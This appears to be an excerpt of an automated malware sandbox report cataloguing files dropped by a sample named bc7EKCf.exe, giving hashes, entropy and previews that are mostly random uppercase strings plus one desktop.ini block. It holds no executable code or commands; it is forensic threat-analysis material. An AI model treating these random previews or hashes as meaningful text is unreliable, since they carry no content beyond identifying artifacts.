                                                                                                                                                                                                                                                                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                                                  MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                                                  SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                                                  SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                                                  SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):402
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.493087299556618
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                                                                                                                                                                                                                                                                  MD5:ECF88F261853FE08D58E2E903220DA14
                                                                                                                                                                                                                                                                                                                  SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                                                                                                                                                                                                                                                                  SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                                                                                                                                                                                                                                                                  SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                                                  MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                                                  SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                                                  SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                                                  SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
